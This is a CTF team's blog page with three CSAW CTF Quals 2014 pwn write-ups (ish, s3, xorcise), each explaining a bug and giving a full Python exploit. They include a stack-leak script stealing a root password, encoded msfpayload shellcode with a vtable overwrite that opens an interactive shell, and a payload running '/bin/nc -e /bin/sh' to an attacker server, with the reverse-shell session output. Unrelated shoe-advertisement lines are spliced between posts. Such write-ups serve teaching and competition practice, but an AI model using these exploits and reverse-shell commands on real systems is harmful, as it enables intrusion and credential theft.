BalalaikaCr3w - CSAW CTF Quals 2014

ish (pwn 300)

Dil4rd — Wed, 01 Oct 2014 20:37:58 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

In this task we have x86 ELF binary ish, which has been run at 54.208.86.14 9988.

This binary is one more Unix shell, but with few commands avaliable:

There is only two intresting commands: lotto and login.

lotto

This command offer you to play in usual guess the number game but with only one attempt. Firstly you choose the number from 1 to 4. Lets name it as N.Then program generates N random numbers and asks you to enter right N numbers. If you entered the same numbers as were generated, you will get message 'You win!', but if you failed:

So, it always prints 4 numbers, but only N of them were set at this function. Because RandomGeneratedNumberArray initialized on stack, this fact means that we can read stack. Futhermore we can enter N equals zero and read 16 bytes from stack. It's definetly vulnerability, but there seems nothing intersting at that location on the stack.. may be it will be usefull later.

login

This command allows you to enter freely as any user except root. If you will try to login as root, program asks you to enter password (valid password takes from file "key").

The first intresting thing in this function is:

This means that program has stack buffer variable of fixed size, receive user name to this buffer and then uses stack allocation to get new buffer (allocated buffer then uses to store user name). This approach isn't vulnerability, but it's very very strange:

if user name length restricted to some small border (256 bytes is a really small size), why don't you use stack buffer of fixed size? It will work faster!
if you care about stack size, why don't you use heap? (because stack allocation is faster? ok...)
if you want to use stack in more effective manner, why don't you round user name length up to 4 bytes (normal stack alignment for x86 systems), but up to 16?
and so on

The right answer is "Without this stack allocation, vulnerability in lotto function allows you to read only 16 bytes only from fixed place. Using this stack allocation you can read stack of any function from list of commands."

Now we just have to find command with something intresting on stack.. and it's login function again!

As you can see from decompiled code above, when you try to login as root, program reads file 'key' with root's password to the static stack buffer. And everything is ok, but root's password erased from this buffer only if you will enter data of length from 1 to 61.

So to retrive root's password we should:

login as anyone except root
login with short user name
login as root
enter password of size 62
exit from user with short user name
login with long enough user name
play lotto
enter 0 (to set N=0)
get 16 bytes of root's password
exit
if no all root's password has been read, go to 2.
exit

Now everything you need is to find proper difference between long and short user names, which allows you to read root's password (root's password was the flag for this challenge).

Our full exploit:

#!/usr/bin/python
from socket import create_connection
from time import sleep
from struct import pack

FLAG = ''

def getPart(n):
	s = create_connection(('54.208.86.14', 9988))

	sleep(0.3)
	print s.recv(1024)
	p = 'aaa\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'oooo\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'root\x00\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'exit\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'A' * (69 - (0x10 * n)) + '\n'
	print p
	s.send(p)

	sleep(0.5)
	print s.recv(1024)
	p = 'lotto\n'
	print p
	s.send(p)

	for i in xrange(0, 5, 1):
		sleep(0.3)
		print s.recv(1024)
		p = '\n'
		print p
		s.send(p)

	sleep(1)
	numbers = s.recv(1024)
	print numbers
	numbers = numbers.split('\n')
	numbers = numbers[2]

	numbers = numbers.replace(' ', '')
	print numbers
	numbers = numbers.split(',')
	print numbers
	flag = ''
	for i in numbers: flag += pack('<I', int(i))

	print flag

	s.close()

	return flag


for i in xrange(0, 4, 1):
	FLAG += getPart(i)

print 'FLAG:'
print FLAG

The flag is: flag{AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOXX}

Sportswear free shipping | New Releases Nike

s3 (pwn 300)

Dil4rd — Wed, 01 Oct 2014 20:36:35 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

Task description gives us only service ip, port (54.165.225.121 and 5333 respectively) and binary, named s3.

$ file s3
s3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xe99ee53d6922baffcd3cecd9e6b333f7538d0633, stripped

As we can see from welcome message it's string storage service:

Welcome to Amazon S3 (String Storage Service)

    c <type> <string> - Create the string <string> as <type>
                        Types are:
                            0 - NULL-Terminated String
                            1 - Counted String
    r <id>            - Read the string referenced by <id>
    u <id> <string>   - Update the string referenced by <id> to <string>
    d <id>            - Destroy the string referenced by <id>
    x                 - Exit Amazon S3

Lets take a look at create string function. According to asm code, two string container types can be created:

container of type 0 is just normal C-like string representation, created on the heap by command "new".
container of type 1 is a class, which can be represented as structure struct_strContainerType1 (shown below). Vtable contains 3 functions. Also created on heap.

#pragma pack(push, 8)
struct struct_strContainerType1 {
  void* vtable;
  __int32 strLength;
  void* pStr;
};
#pragma pack(pop)

Created string container's address placed into structure:

#pragma pack(push, 8)
struct struct_strStorage {
  unsigned __int64 strId;    //pointer to string container
  __int32 strContainerType;  //container type (0 or 1)
  void* pStrContainer;       //pointer to string container
};
#pragma pack(pop)

It should be methioned one more time that strId is an address of string's container, e.i. address of created string if string type is 0 and address of class struct_strContainerType1 if string type is 1.

At the end of this fucntion structure struct_strStorage placed to the global vector.

In read string function we see that it searches for string with requested ID, checks it's container type and ...

...a very strange behavior if container type equal 1: function creates useless duplicate. But it's not a vulnerable bag(

Now lets take a look at update string function.First thing we can notice is an absence of string container type check..

This means that it interpretes string container of any type as string container of type 0 (e.i. as normal C-like string)! So we can override struct_strContainerType1.vtable by any data with two restrictions: it should have no 0x0a and 0x00 bytes.

Now we have found vulnerability, which allow us to run code from almost arbitrary address. The only thing we should recognize: where can we put our shellcode (libc's function system isn't imported). Fortunately heap is REW accessible:

$ cat /proc/16988/maps
00400000-00406000 r-xp 00000000 08:01 264539                             /home/user/s3
00605000-00606000 r-xp 00005000 08:01 264539                             /home/user/s3
00606000-00607000 rwxp 00006000 08:01 264539                             /home/user/s3
01926000-01947000 rwxp 00000000 00:00 0                                  [heap]
...

So here is my exploit (code is ugly, but it works):

import re
import time
import socket
from struct import *

host = "54.165.225.121"
port = 5333

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(5)

def read_str(stId):
	s.recv(1024)
	sBuf = "r {0}".format(stId)
	s.send(sBuf+'\n')
	return s.recv(2014)

def create_str(tp,st):
	s.recv(1024)
	sBuf = "c {0} {1}".format(tp,st)
	s.send(sBuf+'\n')
	buf= s.recv(1024)
	return int(re.findall('\d+',buf)[0])

def update_str(stId,st):
	s.recv(1024)
	sBuf = "u {0} {1}".format(stId,st)
	s.send(sBuf+'\n')
	buf = s.recv(1024)
	return int(re.findall('\d+',buf)[0])

def delete_str(stId):
	s.recv(1024)
	sBuf = "d {0}".format(stId)
	s.send(sBuf+'\n')
	return s.recv(1024)

buf = s.recv(1024)

# msfpayload linux/x64/exec CMD="whoami; sh" R | msfencode -b \x00\x10 -e x64/xor -t python 
#[*] x64/xor succeeded with size 95 (iteration=1)
buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x27\x32\xdc\x60\xca\x39\x2e"
buf += "\x23\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x4d\x09\x84\xf9\x82\x82\x01\x41\x4e\x5c\xf3\x13\xa2"
buf += "\x39\x7d\x6b\xae\xd5\xb4\x4d\xa9\x39\x2e\x6b\xae\xd4"
buf += "\x8e\x88\xc1\x39\x2e\x23\x50\x5a\xb3\x01\xa7\x50\x15"
buf += "\x03\x54\x5a\xdc\x36\x9d\x71\xa7\xc5\x28\x37\xdc\x60"
buf += "\xca\x39\x2e\x23"

#put shellcode to heap and get it's address
myCode = create_str(0,buf)
print('myCode = '+hex(myCode))

#create fake vtable
badBuf = 'A'*0x10+ pack("<Q",myCode)
pVtable = create_str(0,badBuf)
print('pVtable = '+hex(pVtable))

#create string container of type 1
pObj = create_str(1,'a'*0x20)
print('pObj = '+hex(pObj))

#update string container of type 1 and replace original vtable by fake vtable
badBuf = pack("<Q",pVtable)*8
myId3 = update_str(pObj,badBuf)
print('myId3 = '+hex(myId3))

#trigger vulnerability and try to run shellcode
print(read_str(myId3).__repr__())

# bash!
while True:
	s.send(raw_input('$ ')+'\n')
	print(s.recv(1024))

s.close()

Unfortunately I don't save flag anywhere... but I remember that it was at home/amazon/flag, belive me;)

Running sport media | Air Jordan Release Dates Calendar

xorcise (exploit 500)

Dor1s — Thu, 25 Sep 2014 12:26:12 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

We've got the following binary and its source code: xorcise.

$ file xorcise
xorcise: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 
(uses shared libs), for GNU/Linux 2.6.32, not stripped

Looking attentively at source code you can find this interesting moment in decipher function:

#define BLOCK_SIZE 8
#define MAX_BLOCKS 16

uint32_t decipher(cipher_data *data, uint8_t *output)
{
    uint8_t buf[MAX_BLOCKS * BLOCK_SIZE];   //128 
    uint32_t loop;
    uint32_t block_index;
    uint8_t xor_mask = 0x8F;

    memcpy(buf, data->bytes, sizeof(buf));
    if ((data->length / BLOCK_SIZE) > MAX_BLOCKS)
    {
        data->length = BLOCK_SIZE * MAX_BLOCKS;
    }

    for (loop = 0; loop < data->length; loop += 8)
    {
        for (block_index = 0; block_index < 8; ++block_index)
        {
            buf[loop+block_index]^=(xor_mask^data->key[block_index]);
        }
    }
    memcpy(output, buf, sizeof(buf));
}

Also you can get it looking at disasm or decompiled code:

I managed to find it firstly in C-source. So it looks like we can run loop for 8 additional bytes after the buffer buf because data->length is fully controlled by us. We just need to send data->length in range from 0x81 to 0x87. In this case external loop (with index variable loop) will run one more time and internal loop will rewrite other variables on the stack.

After looking at disassembler and some debugging in gdb we distinguished the following stack structure:

128 bytes of buf array

1 byte for xor_mask

4 bytes of block_index

4 bytes of loop

Not bad, we can overwrite xor_mask, block_index and 3 least significant bytes of loop. But when we corrupt block_index variable we are falling info infinite loop or breaking out of loop immediately.

After some analysis of memory addresses in the binary we understand another promising possibility.

We can set xor_mask to 0x00, then do not corrupt block_index (because it should be in range from 0 to 8 for loop execution) and then we set least significant byte of variable loop in such way that buf[loop + block_index] becomes reference for return address! Great! Go back to binary for searching best place for jump to.

Yeah...

So if we jump to 0x080492E9 from decipher, we will have on the stack the following data:

    size_t bytes_read;
    cipher_data encrypted;
    uint8_t decrypted[128];
    request *packet;
    uint32_t authenticated;

    memset(&encrypted, 0, sizeof(encrypted));
    memset(&decrypted, 0, sizeof(decrypted));

    bytes_read = recv(sockfd, (uint8_t *)&encrypted, sizeof(encrypted), 0);
    if (bytes_read <= 0)
    {
        printf("Error: failed to read socket\n");
        return -1;
    }

    if (encrypted.length > bytes_read)
    {
        printf("Error: invalid length in packet\n");
        return -1;
    }

    decipher(&encrypted, decrypted);

Address of encrypted buffer which is fully contolled by us. Excellent!

Data of encrypted is formed in the following way:

struct cipher_data
{
    uint8_t length;
    uint8_t key[8];
    uint8_t bytes[128];
};

- length should be in range from 0x81 to 0x87;

- key we suggest to be {xor_mask, 0x00, 0x00, 0x00, 0x00, offset_to_ret_addr, mask_for_lsb_of_ret_addr, mask_for_2nd_bytes_of_ret_addr} but zero-bytes will terminate our buffer for system(). So we can set xor_mask to 0x20 (space character), then all following bytes will be xored with 0x20 and null-characters become spaces.

- key[5] must be (16 + 3) because return address is offseted by 16 bytes from loop index on the stack. +3 should be added because we are going to modify least significant byte of loop in such way to get least significant byte of return address on next iteration of loop.

- key[6:7] must be 0x9194 ^ 0x92e9 = 0x037d - return address of normal execution flow xored with address of "call system" and xored with 0x20 of course.

- in bytes we can send our payload for system() call, just start it with ";" to cut off all first inpropriate bytes:

;/bin/nc -e /bin/sh <BALALAIKACR3W_EVIL_SERVER_IP> 16969

And now full exploit looks:

#!/usr/bin/python
from socket import create_connection
from struct import pack, unpack

L = '\x87' #length
xor = 0x20
k6 = 0x13
packet = L
packet_str = '\x00' * 5 + chr(k6) + '\x7D\x03'
for c in packet_str:
	packet += chr( xor ^ ord(c))

pl = ';/bin/nc -e /bin/sh <BALALAIKACR3W_EVIL_SERVER_IP> 16969\x00'
padding = 'A' * (128 - len(pl))
packet += pl + padding

s = create_connection(('128.238.66.227', 24001))
s.send(packet)
print s.recv(1024)

s.close()

Now just do something like that on our EVIL SERVER and wait for backconnect:

$ nc -lvvv -p 16969
listening on [any] 16969 ...
128.238.66.227: inverse host lookup failed: Unknown server error : Connection timed out
connect to [BALALAIKACR3W_EVIL_SERVER_IP] from (UNKNOWN) [128.238.66.227] 45427

ls -la
total 44
drwxr-xr-x 2 root root  4096 Sep 20 00:18 .
drwxr-xr-x 3 root root  4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root    30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root     7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
cat flag.txt
flag{code_exec>=crypto_break}
cat password.txt
pass123

Flag is flag{code_exec>=crypto_break}

Sports Shoes | NIKE HOMME

Attachments:

xorcise.zip